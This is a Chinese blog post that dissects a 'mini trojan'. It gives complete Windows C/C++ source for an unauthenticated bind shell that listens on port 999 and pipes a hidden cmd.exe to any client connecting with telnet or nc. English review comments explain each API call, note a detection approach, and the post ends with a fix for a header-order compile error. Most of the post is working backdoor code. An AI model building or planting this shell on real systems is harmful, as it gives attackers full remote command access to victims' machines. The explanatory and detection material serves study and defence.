Mini木马程序剖析

时间:2022-01-14 00:08:52

这是个mini木马,要正向连接,通过telnet或nc连接就好。

#pragma comment(lib,"ws2_32.lib")
#include <winsock2.h>
#include <windows.h>
#define MasterPort 999 //定义监听端口999
/*
 * Entry point: a minimal Windows "bind shell".
 *
 * Behaviour visible below: listen on TCP port MasterPort (999) on every
 * local interface, accept exactly one client, spawn the shell named by the
 * COMSPEC environment variable with its stdin/stdout/stderr redirected to
 * the accepted socket, wait for that shell to exit, then tear everything
 * down and return. There is no authentication step anywhere in this path:
 * whoever connects to the port gets the shell.
 *
 * No return value of any API call below is checked (WSAStartup, bind,
 * listen, accept, CreateProcess, ...), so failures are silent.
 *
 * Defender's view: the observable indicators of this pattern are a process
 * listening on an unexpected port, and a cmd.exe (or other COMSPEC shell)
 * child whose standard handles are socket handles rather than console or
 * pipe handles. Correlating a listening socket with a subsequent
 * CreateProcess from the same parent is the usual detection approach.
 *
 * NOTE(review): `sockaddr_in`/`sockaddr` used without the `struct` keyword
 * and an implicit-int `main()` suggest this was built as C++ under the
 * VC++ 6.0 compiler the page mentions; it is not standard C.
 */
main()
{
WSADATA WSADa;
sockaddr_in SockAddrIn;
SOCKET CSocket,SSocket;
int iAddrSize;
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;
char szCMDPath[255];
// Zero the structures that are passed to the Win32 APIs; note that
// SockAddrIn is not zeroed (its sin_zero padding is left uninitialised).
ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
ZeroMemory(&WSADa,sizeof(WSADATA));
// Path of the command interpreter (normally cmd.exe) taken from the
// COMSPEC environment variable; the return value is not checked, so
// szCMDPath may be left unset if the variable is missing or too long.
GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));

// Initialise Winsock, requesting version 2.2 (0x0202).
WSAStartup(0x0202,&WSADa);

// Local endpoint: IPv4, all interfaces (INADDR_ANY), port MasterPort.
SockAddrIn.sin_family=AF_INET;
SockAddrIn.sin_addr.s_addr=INADDR_ANY;
SockAddrIn.sin_port=htons(MasterPort);
// NOTE(review): WSASocket with dwFlags=0 rather than socket() — presumably
// so the handle is non-overlapped and can later be handed to the child as
// a standard handle; confirm against the Winsock documentation.
CSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);

// Bind the listening socket to port 999 (MasterPort).
bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));

// Start listening; backlog of 1 — this program serves a single client.
listen(CSocket,1);
iAddrSize=sizeof(SockAddrIn);

// Block until one remote client connects; SSocket is that connection.
// (The original comment said "connect to the remote server", but this is
// the accepting side: the program waits, the controller connects.)
SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
// Prepare the STARTUPINFO for the child: hidden window, and all three
// standard handles pointing at the accepted socket.
StartupInfo.cb=sizeof(STARTUPINFO);
StartupInfo.wShowWindow=SW_HIDE;
StartupInfo.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
StartupInfo.hStdInput=(HANDLE)SSocket;
StartupInfo.hStdOutput=(HANDLE)SSocket;
StartupInfo.hStdError=(HANDLE)SSocket;

// Spawn the shell. bInheritHandles=TRUE (5th argument) is what lets the
// child inherit the socket handle set up above. No pipe is created here
// despite the original comment — the socket itself is the child's stdio.
// Then block until the shell exits, so this program serves one session.
CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
// Release the process and thread handles returned by CreateProcess.
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);

// Close both the listening and the accepted socket.
closesocket(CSocket);
closesocket(SSocket);

// Release Winsock.
WSACleanup();
return 0;

}

在学习这段代码的时候,书上原来没有 #include <winsock2.h> 这句。我用 VC++ 6.0 SP6 编译运行,老是提示出错:

error C2065: 'WSASocket' : undeclared identifier

就是这句 CSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);里面的出错。

从网上查了好久,说是没有加 #include <winsock2.h> 这句。后来我把它加到 #include <windows.h> 这句后面,结果出错更多了。有个网友说了一句:头文件有加载顺序,winsock2.h 要放在前面——原因是 windows.h 默认会带入旧版的 winsock.h,若 winsock2.h 在其之后才包含,两者的定义就会冲突。改成上面那段成型代码的顺序后,就编译运行通过了。很经典的一段代码。